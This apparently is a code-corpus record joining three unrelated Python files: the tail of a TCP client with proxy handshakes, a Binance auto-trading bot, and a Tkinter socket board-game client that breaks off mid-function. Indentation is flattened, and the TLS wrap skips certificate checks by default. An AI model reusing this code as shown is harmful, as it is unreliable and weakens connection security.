self.buf = b''
self.closeConnection()
self.error(
"Socks4: bad response from proxy: %s" %
self.buf[0])
self.onProxyConnectionError(
err="Socks4: bad response from proxy: %s" %
self.buf[0])
else:
if ord(self.buf[1]) != 90: # granted
self.buf = b''
self.error("Socks4 proxy refused the connection!")
self.closeConnection()
self.onProxyConnectionError(
err="Socks4 proxy refused the connection!") # Server returned an error
else:
self.trace('Proxy tunnel established')
readTrueData = True
# Get the bound address/port
self.proxyConnectSuccess = True
self.buf = b''
# handle http
elif self.proxyType == PROXY_TYPE_HTTP:
self.trace("http proxy activated")
self.trace("response received: %s" % self.buf)
                # if \r\n\r\n is detected then the response is complete
                # otherwise we must wait for more data
if self.buf.find(b"\r\n\r\n") != -1:
# read the status line
statusline = self.buf.splitlines()[0].split(b" ", 2)
if statusline[0] not in (b"HTTP/1.0", b"HTTP/1.1"):
self.buf = b''
self.closeConnection()
self.error(
"Bad http response from proxy: %s" %
statusline)
self.onProxyConnectionError(
err="Bad http response from proxy: %s" % statusline)
else:
# extract the status code
statuscode = int(statusline[1])
if statuscode != 200:
self.buf = b''
self.closeConnection()
self.error(
"Http proxy refuses the connection: %s" %
statusline)
self.onProxyConnectionError(
err="The HTTP proxy refuses the connection!\nStatus code received: %s" %
statuscode)
else:
# tunnel established
# continue with ssl if needed
self.trace('Proxy tunnel established')
if self.sslSupport:
certReqs = ssl.CERT_NONE
if self.checkSsl:
certReqs = ssl.CERT_REQUIRED
try:
self.socket = ssl.wrap_socket(
self.socket, cert_reqs=certReqs, ssl_version=self.sslVersion)
self.socket.do_handshake()
except Exception as e:
self.buf = b''
self.closeConnection()
self.error(
"SSL Http proxy refuses to establish the tunnel: %s" % e)
self.onProxyConnectionError(
err="The SSL HTTP proxy refuses to establish the tunnel")
else:
self.proxyConnectSuccess = True
self.buf = b''
readTrueData = True
else:
# set final step
self.proxyConnectSuccess = True
self.buf = b''
readTrueData = True
else:
raise Exception('need more proxy headers: %s' % self.buf)
# handle socks5: not implemented
elif self.proxyType == PROXY_TYPE_SOCKS5:
if ord(self.buf[0]) != 5: # bad version on response
self.error(
"Socks5: bad response from proxy: %s" %
self.buf[0])
self.onProxyConnectionError(
err="Socks5: bad response from proxy: %s" %
self.buf[0])
else:
if ord(self.buf[1]) == 0: # No authentication is required
pass
# we need to perform a basic username/password
elif ord(self.buf[1]) == 2:
pass
else:
self.buf = b''
self.error(
"Socks5: authentication type not supported: %s" %
self.buf[1])
self.onProxyConnectionError(
err="Socks5: authentication type not supported: %s" %
self.buf[1])
else:
self.error('proxy type unknown: %s' % self.proxyType)
readTrueData = True
except Exception as e:
self.error("more data needed for proxy handshake: %s" % e)
return readTrueData
def stop(self):
"""
Stops the thread
"""
self.running = False
self.event.set()
self.trace('Tcp Client Thread Stopped')
def sendHttpPacket(self, packet):
"""
Send packet without terminator
@param packet: packet to send
@type packet: string
"""
if isinstance(packet, bytes): # python 3 support
self.queue.put(packet)
else:
if sys.version_info[0] == 3: # python 3 support
self.queue.put(bytes(packet, "UTF-8"))
else:
self.queue.put(packet)
def sendPacket(self, packet):
"""
Send packet to network, terminator added at the end
@param packet: packet to send
@type packet: string
"""
if self.wsSupport and self.wsHandshakeSuccess:
if sys.version_info[0] == 3: # python 3 support
if isinstance(packet, bytes):
payload_data = packet + self.terminator
else:
payload_data = bytes(packet, "UTF-8") + self.terminator
else:
payload_data = packet + self.terminator
# make chunk
if sys.version_info[0] == 3: # python 3 support
chunks = [payload_data[x:x + self.wsMaxPayloadSize]
for x in range(0, len(payload_data), self.wsMaxPayloadSize)]
else:
chunks = [payload_data[x:x + self.wsMaxPayloadSize]
for x in xrange(0, len(payload_data), self.wsMaxPayloadSize)]
# encode data in the websocket packet and enqueue it
for chunk in chunks:
# encode in text websocket
wsdata = self.wsCodec.encodeText(data=chunk)
if isinstance(packet, bytes): # python 3 support
self.queue.put(wsdata)
else:
if sys.version_info[0] == 3: # python 3 support
self.queue.put(bytes(wsdata, "UTF-8"))
else:
self.queue.put(wsdata)
else:
if isinstance(packet, bytes): # python 3 support
self.queue.put(packet + self.terminator)
else:
if sys.version_info[0] == 3: # python 3 support
self.queue.put(bytes(packet, "UTF-8") + self.terminator)
else:
self.queue.put(packet + self.terminator)
def handleIncomingPacket(self, pdu):
"""
Function to reimplement
Called on incoming packet
@param pdu: payload received
@type pdu: string
"""
self.trace(pdu)
def getLocalAddress(self):
"""
Returns the binding address
@return: local bind address (ip, port)
@rtype: tuple
"""
rslt = self.localAddress
s = self.socket
if s:
try:
rslt = s.getsockname()
except Exception:
pass
return rslt
def onWsHanshakeError(self, err):
"""
Function to reimplement
Called on ws handshake error
@param err: error message
@type err: string
"""
pass
def onWsHanshakeSuccess(self):
"""
Function to reimplement
Called on successful ws handshake
"""
pass
def onProxyConnectionSuccess(self):
"""
Function to reimplement
Called on successful proxy handshake
"""
pass
def onConnection(self):
"""
Function to reimplement
Called on successful tcp connection
"""
pass
def onProxyConnection(self):
"""
Function to reimplement
Called on successful tcp connection on proxy
"""
pass
def onDisconnection(self, byServer=False, inactivityServer=False):
"""
Function to reimplement
Called on successful tcp disconnection
@param byServer: True if the server closes the connection
@type byServer: boolean
"""
pass
def onConnectionRefused(self, err):
"""
Function to reimplement
@param err: error message
@type err: string
"""
pass
def onResolveHostnameFailed(self, err):
"""
Function to reimplement
@param err: error message
@type err: string
"""
pass
def onResolveHostnameProxyFailed(self, err):
"""
Function to reimplement
@param err: error message
@type err: string
"""
pass
def onConnectionTimeout(self, err):
"""
Function to reimplement
@param err: error message
@type err: string
"""
pass
def onInactivityTimeout(self):
"""
Function to reimplement
        Called on inactivity timeout
"""
pass
def onProxyConnectionRefused(self, err):
"""
Function to reimplement
@param err: error message
@type err: string
"""
pass
def onProxyConnectionError(self, err):
"""
Function to reimplement
@param err: error message
@type err: string
"""
pass
def onProxyConnectionTimeout(self, err):
"""
Function to reimplement
@param err: error message
@type err: string
"""
pass
def trace(self, txt):
"""
Display txt on screen
@param txt: message
@type txt: string
"""
print(txt)
def error(self, txt):
"""
Display txt on screen
@param txt: message
@type txt: string
"""
print(txt)
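# Usage sketch (illustrative): the class is meant to be subclassed, with the
# on*() callbacks and handleIncomingPacket() overridden. Host and port below
# are placeholders.
#
#     class MyClient(TcpClientThread):
#         def onConnection(self):
#             self.sendPacket(b'hello')
#         def handleIncomingPacket(self, pdu):
#             print("received: %s" % pdu)
#
#     client = MyClient()
#     client.setServerAddress('127.0.0.1', 8080)
#     client.start()             # start the run() loop of the thread
#     client.startConnection()   # open the TCP connection
#     # ... exchange packets ...
#     client.closeConnection()
#     client.stop()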
|
Trading.py
|
# -*- coding: UTF-8 -*-
# @yasinkuyu
# Define Python imports
import os
import sys
import time
import config
import threading
import math
import logging
import logging.handlers
# Define Custom imports
from Database import Database
from Orders import Orders
formater_str = '%(asctime)s,%(msecs)d %(levelname)s %(name)s: %(message)s'
formatter = logging.Formatter(formater_str)
datefmt="%Y-%b-%d %H:%M:%S"
LOGGER_ENUM = {'debug':'debug.log', 'trading':'trades.log','errors':'general.log'}
#LOGGER_FILE = LOGGER_ENUM['pre']
LOGGER_FILE = "binance-trader.log"
FORMAT = '%(asctime)-15s - %(levelname)s: %(message)s'
logger = logging.basicConfig(filename=LOGGER_FILE, filemode='a',
format=formater_str, datefmt=datefmt,
level=logging.INFO)
# Approximated value to get back the commission for sell and buy
TOKEN_COMMISION = 0.001
BNB_COMMISION = 0.0005
#((eth*0.05)/100)
class Trading():
# Define trade vars
order_id = 0
order_data = None
buy_filled = True
sell_filled = True
buy_filled_qty = 0
sell_filled_qty = 0
    # stop-loss percentage (panic sell when the price drops by this much, e.g. 10%)
stop_loss = 0
# Buy/Sell qty
quantity = 0
# BTC amount
amount = 0
# float(step_size * math.floor(float(free)/step_size))
step_size = 0
# Define static vars
WAIT_TIME_BUY_SELL = 1 # seconds
WAIT_TIME_CHECK_BUY_SELL = 0.2 # seconds
WAIT_TIME_CHECK_SELL = 5 # seconds
WAIT_TIME_STOP_LOSS = 20 # seconds
MAX_TRADE_SIZE = 7 # int
# Type of commision, Default BNB_COMMISION
commision = BNB_COMMISION
def __init__(self, option):
print("options: {0}".format(option))
# Get argument parse options
self.option = option
# Define parser vars
self.order_id = self.option.orderid
self.quantity = self.option.quantity
self.wait_time = self.option.wait_time
self.stop_loss = self.option.stop_loss
self.increasing = self.option.increasing
self.decreasing = self.option.decreasing
# BTC amount
self.amount = self.option.amount
# Type of commision
if self.option.commision == 'TOKEN':
self.commision = TOKEN_COMMISION
# setup Logger
self.logger = self.setup_logger(self.option.symbol, debug=self.option.debug)
def setup_logger(self, symbol, debug=True):
"""Function setup as many loggers as you want"""
#handler = logging.FileHandler(log_file)
#handler.setFormatter(formatter)
#logger.addHandler(handler)
logger = logging.getLogger(symbol)
stout_handler = logging.StreamHandler(sys.stdout)
if debug:
logger.setLevel(logging.DEBUG)
stout_handler.setLevel(logging.DEBUG)
#handler = logging.handlers.SysLogHandler(address='/dev/log')
#logger.addHandler(handler)
stout_handler.setFormatter(formatter)
logger.addHandler(stout_handler)
return logger
def buy(self, symbol, quantity, buyPrice, profitableSellingPrice):
# Do you have an open order?
self.check_order()
try:
# Create order
orderId = Orders.buy_limit(symbol, quantity, buyPrice)
# Database log
Database.write([orderId, symbol, 0, buyPrice, 'BUY', quantity, self.option.profit])
#print('Buy order created id:%d, q:%.8f, p:%.8f' % (orderId, quantity, float(buyPrice)))
self.logger.info('%s : Buy order created id:%d, q:%.8f, p:%.8f, Take profit aprox :%.8f' % (symbol, orderId, quantity, float(buyPrice), profitableSellingPrice))
self.order_id = orderId
return orderId
except Exception as e:
#print('bl: %s' % (e))
self.logger.debug('Buy error: %s' % (e))
time.sleep(self.WAIT_TIME_BUY_SELL)
return None
def sell(self, symbol, quantity, orderId, sell_price, last_price):
'''
        Try to sell at the specified limit price until it is reached.
If not successful, the order will be canceled.
'''
buy_order = Orders.get_order(symbol, orderId)
if buy_order['status'] == 'FILLED' and buy_order['side'] == 'BUY':
#print('Buy order filled... Try sell...')
self.logger.info('Buy order filled... Try sell...')
else:
time.sleep(self.WAIT_TIME_CHECK_BUY_SELL)
if buy_order['status'] == 'FILLED' and buy_order['side'] == 'BUY':
#print('Buy order filled after 0.1 second... Try sell...')
self.logger.info('Buy order filled after 0.1 second... Try sell...')
elif buy_order['status'] == 'PARTIALLY_FILLED' and buy_order['side'] == 'BUY':
#print('Buy order partially filled... Try sell... Cancel remaining buy...')
self.logger.info('Buy order partially filled... Try sell... Cancel remaining buy...')
self.cancel(symbol, orderId)
else:
self.cancel(symbol, orderId)
#print('Buy order fail (Not filled) Cancel order...')
self.logger.warning('Buy order fail (Not filled) Cancel order...')
self.order_id = 0
return
sell_order = Orders.sell_limit(symbol, quantity, sell_price)
sell_id = sell_order['orderId']
#print('Sell order create id: %d' % sell_id)
self.logger.info('Sell order create id: %d' % sell_id)
time.sleep(self.WAIT_TIME_CHECK_SELL)
if sell_order['status'] == 'FILLED':
#print('Sell order (Filled) Id: %d' % sell_id)
#print('LastPrice : %.8f' % last_price)
#print('Profit: %%%s. Buy price: %.8f Sell price: %.8f' % (self.option.profit, float(sell_order['price']), sell_price))
self.logger.info('Sell order (Filled) Id: %d' % sell_id)
self.logger.info('LastPrice : %.8f' % last_price)
self.logger.info('Profit: %%%s. Buy price: %.8f Sell price: %.8f' % (self.option.profit, float(sell_order['price']), sell_price))
self.order_id = 0
self.order_data = None
return
'''
        If all sell attempts fail,
        fall back to the stop-loss.
'''
if self.stop_loss > 0:
# If sell order failed after 5 seconds, 5 seconds more wait time before selling at loss
time.sleep(self.WAIT_TIME_CHECK_SELL)
if self.stop(symbol, quantity, sell_id, last_price):
if Orders.get_order(symbol, sell_id)['status'] != 'FILLED':
#print('We apologize... Sold at loss...')
self.logger.info('We apologize... Sold at loss...')
else:
#print('We apologize... Cant sell even at loss... Please sell manually... Stopping program...')
self.logger.info('We apologize... Cant sell even at loss... Please sell manually... Stopping program...')
self.cancel(symbol, sell_id)
exit(1)
        sell_status = Orders.get_order(symbol, sell_id)['status']
        while sell_status != 'FILLED':
time.sleep(self.WAIT_TIME_CHECK_SELL)
sell_status = Orders.get_order(symbol, sell_id)['status']
lastPrice = Orders.get_ticker(symbol)
#print('Status: %s Current price: %.8f Sell price: %.8f' % (sell_status, lastPrice, sell_price))
#print('Sold! Continue trading...')
self.logger.info('Status: %s Current price: %.8f Sell price: %.8f' % (sell_status, lastPrice, sell_price))
self.logger.info('Sold! Continue trading...')
self.order_id = 0
self.order_data = None
def stop(self, symbol, quantity, orderId, last_price):
# If the target is not reached, stop-loss.
stop_order = Orders.get_order(symbol, orderId)
stopprice = self.calc(float(stop_order['price']))
lossprice = stopprice - (stopprice * self.stop_loss / 100)
status = stop_order['status']
# Order status
if status == 'NEW' or status == 'PARTIALLY_FILLED':
if self.cancel(symbol, orderId):
# Stop loss
if last_price >= lossprice:
sello = Orders.sell_market(symbol, quantity)
#print('Stop-loss, sell market, %s' % (last_price))
self.logger.info('Stop-loss, sell market, %s' % (last_price))
sell_id = sello['orderId']
if sello == True:
return True
else:
# Wait a while after the sale to the loss.
time.sleep(self.WAIT_TIME_STOP_LOSS)
statusloss = sello['status']
if statusloss != 'NEW':
print('Stop-loss, sold')
self.logger.info('Stop-loss, sold')
return True
else:
self.cancel(symbol, sell_id)
return False
else:
                    sello = Orders.sell_limit(symbol, quantity, lossprice)
                    sell_id = sello['orderId']
                    print('Stop-loss, sell limit, %s' % (lossprice))
time.sleep(self.WAIT_TIME_STOP_LOSS)
statusloss = sello['status']
if statusloss != 'NEW':
print('Stop-loss, sold')
return True
else:
self.cancel(symbol, sell_id)
return False
else:
print('Cancel did not work... Might have been sold before stop loss...')
return True
elif status == 'FILLED':
self.order_id = 0
self.order_data = None
print('Order filled')
return True
else:
return False
def check(self, symbol, orderId, quantity):
        # If a profit opportunity exists but the buy did not fill at the specified price, buy at market price instead.
# Do you have an open order?
self.check_order()
trading_size = 0
time.sleep(self.WAIT_TIME_BUY_SELL)
while trading_size < self.MAX_TRADE_SIZE:
# Order info
order = Orders.get_order(symbol, orderId)
side = order['side']
price = float(order['price'])
# TODO: Sell partial qty
orig_qty = float(order['origQty'])
self.buy_filled_qty = float(order['executedQty'])
status = order['status']
#print('Wait buy order: %s id:%d, price: %.8f, orig_qty: %.8f' % (symbol, order['orderId'], price, orig_qty))
self.logger.info('Wait buy order: %s id:%d, price: %.8f, orig_qty: %.8f' % (symbol, order['orderId'], price, orig_qty))
if status == 'NEW':
if self.cancel(symbol, orderId):
buyo = Orders.buy_market(symbol, quantity)
#print('Buy market order')
self.logger.info('Buy market order')
self.order_id = buyo['orderId']
self.order_data = buyo
if buyo == True:
break
else:
trading_size += 1
continue
else:
break
elif status == 'FILLED':
self.order_id = order['orderId']
self.order_data = order
#print('Filled')
self.logger.info('Filled')
break
elif status == 'PARTIALLY_FILLED':
#print('Partial filled')
self.logger.info('Partial filled')
break
else:
trading_size += 1
continue
def cancel(self, symbol, orderId):
# If order is not filled, cancel it.
check_order = Orders.get_order(symbol, orderId)
if not check_order:
self.order_id = 0
self.order_data = None
return True
if check_order['status'] == 'NEW' or check_order['status'] != 'CANCELLED':
Orders.cancel_order(symbol, orderId)
self.order_id = 0
self.order_data = None
return True
def calc(self, lastBid):
try:
#Estimated sell price considering commision
return lastBid + (lastBid * self.option.profit / 100) + (lastBid *self.commision)
#return lastBid + (lastBid * self.option.profit / 100)
except Exception as e:
print('Calc Error: %s' % (e))
return
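    # Worked example of calc() (illustrative numbers): with lastBid = 0.01000000,
    # profit = 1.0 (percent) and the default BNB commission of 0.0005, the
    # estimated profitable selling price is
    #     0.01 + 0.01 * 1.0 / 100 + 0.01 * 0.0005 = 0.01010500
    # which action() then uses as profitableSellingPrice.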
def check_order(self):
# If there is an open order, exit.
if self.order_id > 0:
exit(1)
def action(self, symbol):
#import ipdb; ipdb.set_trace()
# Order amount
quantity = self.quantity
# Fetches the ticker price
lastPrice = Orders.get_ticker(symbol)
# Order book prices
lastBid, lastAsk = Orders.get_order_book(symbol)
# Target buy price, add little increase #87
buyPrice = lastBid + self.increasing
# Target sell price, decrease little
sellPrice = lastAsk - self.decreasing
# Spread ( profit )
profitableSellingPrice = self.calc(lastBid)
# Check working mode
if self.option.mode == 'range':
buyPrice = float(self.option.buyprice)
sellPrice = float(self.option.sellprice)
profitableSellingPrice = sellPrice
# Screen log
if self.option.prints and self.order_id == 0:
spreadPerc = (lastAsk/lastBid - 1) * 100.0
#print('price:%.8f buyp:%.8f sellp:%.8f-bid:%.8f ask:%.8f spread:%.2f' % (lastPrice, buyPrice, profitableSellingPrice, lastBid, lastAsk, spreadPerc))
self.logger.debug('price:%.8f buyprice:%.8f sellprice:%.8f bid:%.8f ask:%.8f spread:%.2f Originalsellprice:%.8f' % (lastPrice, buyPrice, profitableSellingPrice, lastBid, lastAsk, spreadPerc, profitableSellingPrice-(lastBid *self.commision) ))
# analyze = threading.Thread(target=analyze, args=(symbol,))
# analyze.start()
if self.order_id > 0:
# Profit mode
if self.order_data is not None:
order = self.order_data
# Last control
newProfitableSellingPrice = self.calc(float(order['price']))
if (lastAsk >= newProfitableSellingPrice):
profitableSellingPrice = newProfitableSellingPrice
# range mode
if self.option.mode == 'range':
profitableSellingPrice = self.option.sellprice
'''
If the order is complete,
try to sell it.
'''
# Perform buy action
sellAction = threading.Thread(target=self.sell, args=(symbol, quantity, self.order_id, profitableSellingPrice, lastPrice,))
sellAction.start()
return
'''
Did profit get caught
if ask price is greater than profit price,
buy with my buy price,
'''
if (lastAsk >= profitableSellingPrice and self.option.mode == 'profit') or \
(lastPrice <= float(self.option.buyprice) and self.option.mode == 'range'):
self.logger.info ("MOde: {0}, Lastsk: {1}, Profit Sell Price {2}, ".format(self.option.mode, lastAsk, profitableSellingPrice))
if self.order_id == 0:
self.buy(symbol, quantity, buyPrice, profitableSellingPrice)
# Perform check/sell action
# checkAction = threading.Thread(target=self.check, args=(symbol, self.order_id, quantity,))
# checkAction.start()
def logic(self):
return 0
def filters(self):
symbol = self.option.symbol
# Get symbol exchange info
symbol_info = Orders.get_info(symbol)
if not symbol_info:
#print('Invalid symbol, please try again...')
self.logger.error('Invalid symbol, please try again...')
exit(1)
symbol_info['filters'] = {item['filterType']: item for item in symbol_info['filters']}
return symbol_info
def format_step(self, quantity, stepSize):
return float(stepSize * math.floor(float(quantity)/stepSize))
def validate(self):
valid = True
symbol = self.option.symbol
filters = self.filters()['filters']
# Order book prices
lastBid, lastAsk = Orders.get_order_book(symbol)
lastPrice = Orders.get_ticker(symbol)
minQty = float(filters['LOT_SIZE']['minQty'])
minPrice = float(filters['PRICE_FILTER']['minPrice'])
minNotional = float(filters['MIN_NOTIONAL']['minNotional'])
quantity = float(self.option.quantity)
# stepSize defines the intervals that a quantity/icebergQty can be increased/decreased by.
stepSize = float(filters['LOT_SIZE']['stepSize'])
# tickSize defines the intervals that a price/stopPrice can be increased/decreased by
tickSize = float(filters['PRICE_FILTER']['tickSize'])
        # If the --increasing option is smaller than tickSize, use tickSize instead
if (float(self.option.increasing) < tickSize):
self.increasing = tickSize
        # If the --decreasing option is smaller than tickSize, use tickSize instead
if (float(self.option.decreasing) < tickSize):
self.decreasing = tickSize
# Just for validation
lastBid = lastBid + self.increasing
        # Default quantity: derive it from minNotional and add a 10% margin
        # (used when neither --quantity nor --amount is given)
quantity = (minNotional / lastBid)
quantity = quantity + (quantity * 10 / 100)
notional = minNotional
if self.amount > 0:
# Calculate amount to quantity
quantity = (self.amount / lastBid)
if self.quantity > 0:
# Format quantity step
quantity = self.quantity
quantity = self.format_step(quantity, stepSize)
notional = lastBid * float(quantity)
# Set Globals
self.quantity = quantity
self.step_size = stepSize
# minQty = minimum order quantity
if quantity < minQty:
#print('Invalid quantity, minQty: %.8f (u: %.8f)' % (minQty, quantity))
self.logger.error('Invalid quantity, minQty: %.8f (u: %.8f)' % (minQty, quantity))
valid = False
if lastPrice < minPrice:
#print('Invalid price, minPrice: %.8f (u: %.8f)' % (minPrice, lastPrice))
self.logger.error('Invalid price, minPrice: %.8f (u: %.8f)' % (minPrice, lastPrice))
valid = False
# minNotional = minimum order value (price * quantity)
if notional < minNotional:
#print('Invalid notional, minNotional: %.8f (u: %.8f)' % (minNotional, notional))
self.logger.error('Invalid notional, minNotional: %.8f (u: %.8f)' % (minNotional, notional))
valid = False
if not valid:
exit(1)
def run(self):
cycle = 0
actions = []
symbol = self.option.symbol
print('Auto Trading for Binance.com @yasinkuyu')
print('\n')
# Validate symbol
self.validate()
print('Started...')
print('Trading Symbol: %s' % symbol)
print('Buy Quantity: %.8f' % self.quantity)
print('Stop-Loss Amount: %s' % self.stop_loss)
#print('Estimated profit: %.8f' % (self.quantity*self.option.profit))
if self.option.mode == 'range':
if self.option.buyprice == 0 or self.option.sellprice == 0:
print('Please enter --buyprice / --sellprice\n')
exit(1)
print('Range Mode Options:')
            print('\tBuy Price: %.8f' % self.option.buyprice)
            print('\tSell Price: %.8f' % self.option.sellprice)
else:
print('Profit Mode Options:')
print('\tPreferred Profit: %0.2f%%' % self.option.profit)
print('\tBuy Price : (Bid+ --increasing %.8f)' % self.increasing)
print('\tSell Price: (Ask- --decreasing %.8f)' % self.decreasing)
print('\n')
startTime = time.time()
"""
# DEBUG LINES
actionTrader = threading.Thread(target=self.action, args=(symbol,))
actions.append(actionTrader)
actionTrader.start()
endTime = time.time()
if endTime - startTime < self.wait_time:
time.sleep(self.wait_time - (endTime - startTime))
# 0 = Unlimited loop
if self.option.loop > 0:
cycle = cycle + 1
"""
while (cycle <= self.option.loop):
startTime = time.time()
actionTrader = threading.Thread(target=self.action, args=(symbol,))
actions.append(actionTrader)
actionTrader.start()
endTime = time.time()
if endTime - startTime < self.wait_time:
time.sleep(self.wait_time - (endTime - startTime))
# 0 = Unlimited loop
if self.option.loop > 0:
cycle = cycle + 1
|
__init__.py
|
######## This is the main file that creates an instance of the game using Tkinter
######## Run the "server.py" file before you run this file
import socket
import threading
from queue import Queue
HOST = input("Enter server's IP address: ") # user should enter the IP address displayed on the server window
PORT = int(input("Enter PORT number: ")) # user should enter the PORT number displayed on the server window
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
try:
server.connect((HOST,PORT))
print("Connected to server.")
break
except:
print("\nConnection failed. Try again.\n")
HOST = input("Enter server's IP address:")
PORT = int(input("Enter PORT number:"))
#################################################################
# Sockets client code copied from 15-112 Sockets mini-lecture
def handleServerMsg(server, serverMsg):
server.setblocking(1)
msg = ""
command = ""
while True:
msg += server.recv(10).decode("UTF-8")
command = msg.split("\n")
while (len(command) > 1):
readyMsg = command[0]
msg = "\n".join(command[1:])
serverMsg.put(readyMsg)
command = msg.split("\n")
#################################################################
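# Usage sketch (assumption: elsewhere in this file the client starts the message
# listener roughly like this, pairing handleServerMsg with a Queue that the
# Tkinter timer loop drains):
#
#     serverMsg = Queue(100)
#     threading.Thread(target=handleServerMsg, args=(server, serverMsg),
#                      daemon=True).start()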
from pieceClasses import *
from algorithms import *
import copy
import random
#### Graphics Functions
from tkinter import *
def init(data):
data.background = PhotoImage(file="background.gif", width=data.width, height=data.height) # image downloaded from https://v.paixin.com/photocopyright/132056282
data.countdown = 20
data.isPaused = False
data.board = [ [Post(0, 0, LMN("A")), Headquarters(0, 1, Flag("A")), Post(0, 2, Capt("A")), Headquarters(0, 3, LMN("A")), Post(0, 4, LMN("A"))],
[Post(1, 0, Capt("A")), Post(1, 1, Lt("A")), Post(
1, 2, BGen("A")), Post(1, 3, Spr("A")), Post(1, 4, Spr("A"))],
[Post(2, 0, MGen("A")), Camp(2, 1), Post(
2, 2, Lt("A")), Camp(2, 3), Post(2, 4, Maj("A"))],
[Post(3, 0, Gen("A")), Post(3, 1, Bomb("A")), Camp(
3, 2), Post(3, 3, Lt("A")), Post(3, 4, Mar("A"))],
[Post(4, 0, Maj("A")), Camp(4, 1), Post(4, 2, Spr("A")),
Camp(4, 3), Post(4, 4, Bomb("A"))],
[Post(5, 0, MGen("A")), Post(5, 1, Col("A")), Post(
5, 2, BGen("A")), Post(5, 3, Capt("A")), Post(5, 4, Col("A"))],
[Post(6, 0, MGen("B")), Post(6, 1, Spr("B")), Post(
6, 2, Capt("B")), Post(6, 3, Mar("B")), Post(6, 4, Col("B"))],
[Post(7, 0, Bomb("B")), Camp(7, 1), Post(
7, 2, Spr("B")), Camp(7, 3), Post(7, 4, Bomb("B"))],
[Post(8, 0, Capt("B")), Post(8, 1, Maj("B")), Camp(
8, 2), Post(8, 3, BGen("B")), Post(8, 4, Lt("B"))],
[Post(9, 0, Maj("B")), Camp(9, 1), Post(
9, 2, BGen("B")), Camp(9, 3), Post(9, 4, Gen("B"))],
[Post(10, 0, LMN("B")), Post(10, 1, Lt("B")), Post(
10, 2, Spr("B")), Post(10, 3, MGen("B")), Post(10, 4, LMN("B"))],
[Post(11, 0, Capt("B")), Headquarters(11, 1, Lt("B")), Post(11, 2, Col("B")), Headquarters(11, 3, Flag("B")), Post(11, 4, LMN("B"))]]
data.mode = "start"
data.lastMode = data.mode
data.turn = "B"
data.selectCount = 0
data.firstSelect, data.secondSelect = None, None
data.move = None
data.myPID = None
data.selfPlayerReady, data.otherPlayerReady = False, False
data.darkMode = False
data.marA = True
data.marB = True
data.winner = None
data.errorMsg = None
data.maxDepth = 0
data.otherPlayerOnline = False
data.displaySuggestedMove = 0
data.timer = None
data.playerMove = None
# a helper function that switches two pieces for the layout mode;
# returns an error message if the switch is illegal (and None if legal)
def switch(data):
(a, b) = data.firstSelect
(c, d) = data.secondSelect
# pieces must stay within their own side
if data.board[a][b].piece.side != data.board[c][d].piece.side:
return "Cannot switch pieces of the other side!"
# flags must remain in headquarters
    if data.board[a][b].piece.order == 0 and \
            ((((a, b) == (0, 1) or (a, b) == (0, 3)) and ((c, d) != (0, 1) and (c, d) != (0, 3))) or
             (((a, b) == (11, 1) or (a, b) == (11, 3)) and ((c, d) != (11, 1) and (c, d) != (11, 3)))):
        return "Flags must be placed in a Headquarter!"
    if data.board[c][d].piece.order == 0 and \
            ((((c, d) == (0, 1) or (c, d) == (0, 3)) and ((a, b) != (0, 1) and (a, b) != (0, 3))) or
             (((c, d) == (11, 1) or (c, d) == (11, 3)) and ((a, b) != (11, 1) and (a, b) != (11, 3)))):
        return "The Flag must be placed in one of the two Headquarters!"
# bombs cannot be on the front row
if data.board[a][b].piece.order == None and (c == 5 or c == 6):
return "Bombs cannot be placed on the front row!"
if data.board[c][d].piece.order == None and (a == 5 or a == 6):
return "Bombs cannot be placed on the front row!"
# landmines must remain at the last two rows
if data.board[a][b].piece.order == 10 and (c in [2, 3, 4, 5, 6, 7, 8, 9]):
return "Landmines can only be placed on the last two rows!"
if data.board[c][d].piece.order == 10 and (a in [2, 3, 4, 5, 6, 7, 8, 9]):
return "Landmines can only be placed on the last two rows!"
data.board[a][b].piece, data.board[c][d].piece = data.board[c][d].piece, data.board[a][b].piece
# undo selection
data.selectCount = 0
data.board[a][b].select()
data.board[c][d].select()
return None
def mousePressed(event, data):
if data.mode == "start":
if 200 < event.x < 400 and 500 < event.y < 580:
data.darkMode = True
if 200 < event.x < 400 and 340 < event.y < 400:
data.mode = "selectDifficulty"
elif 200 < event.x < 400 and (420 < event.y < 480 or 500 < event.y < 580):
data.mode = "twoPlayerLayout"
elif data.mode == "selectDifficulty":
if 200 < event.x < 400 and 340 < event.y < 400:
# easy mode
data.maxDepth = 2
data.mode = "onePlayerLayout"
elif 200 < event.x < 400 and 420 < event.y < 480:
# hard mode
data.maxDepth = 4
data.mode = "onePlayerLayout"
elif data.mode == "twoPlayerLayout" and data.otherPlayerOnline:
if 385 < event.x < 465 and 380 < event.y < 420:
# player is ready
data.selectCount = 0
data.firstSelect = None
data.selfPlayerReady = True
for x in range(12):
for y in range(5):
if data.board[x][y].selected:
data.board[x][y].selected = False
msg = "playerReady +1\n"
print("sending: ", msg)
data.server.send(msg.encode())
if getLocation(event.x, event.y) != None:
(i, j) = getLocation(event.x, event.y)
if data.myPID == "PlayerA":
(i, j) = (11-i, 4-j) # reverse the board
# cannot put pieces in Camps during layout stage
if type(data.board[i][j]) == Camp:
return None
# cannot change the layout of the other side
if data.myPID == "PlayerA" and i >= 6:
return None
elif data.myPID == "PlayerB" and i < 6:
return None
data.selectCount += 1
data.board[i][j].select()
if data.selectCount == 1:
data.firstSelect = (i, j)
elif data.selectCount == 2:
data.secondSelect = (i, j)
(a, b) = data.firstSelect
(c, d) = data.secondSelect
data.errorMsg = switch(data)
if data.errorMsg == None:
msg = "playerSwitched %d %d %d %d\n" % (a, b, c, d)
print("sending: ", msg)
data.server.send(msg.encode())
else:
# undo selection
data.selectCount = 0
data.errorMsg = None
data.firstSelect = None
for x in range(12):
for y in range(5):
if data.board[x][y].selected:
data.board[x][y].selected = False
elif data.mode == "onePlayerLayout":
if 385 < event.x < 465 and 380 < event.y < 420:
# start game
data.selectCount = 0
data.firstSelect = None
for x in range(12):
for y in range(5):
if data.board[x][y].selected:
data.board[x][y].selected = False
data.mode = "onePlayerGame"
if getLocation(event.x, event.y) != None:
(i, j) = getLocation(event.x, event.y)
if type(data.board[i][j]) == Camp:
return None
data.selectCount += 1
data.board[i][j].select()
if data.selectCount == 1:
data.firstSelect = (i, j)
elif data.selectCount == 2:
data.secondSelect = (i, j)
data.errorMsg = switch(data)
else:
# undo selection
data.selectCount = 0
data.firstSelect = None
data.errorMsg = None
for x in range(12):
for y in range(5):
if data.board[x][y].selected:
data.board[x][y].selected = False
elif data.mode == "twoPlayerGame" and data.displaySuggestedMove == 0:
if getLocation(event.x, event.y) == None:
# clear selection
data.selectCount = 0
if data.firstSelect != None:
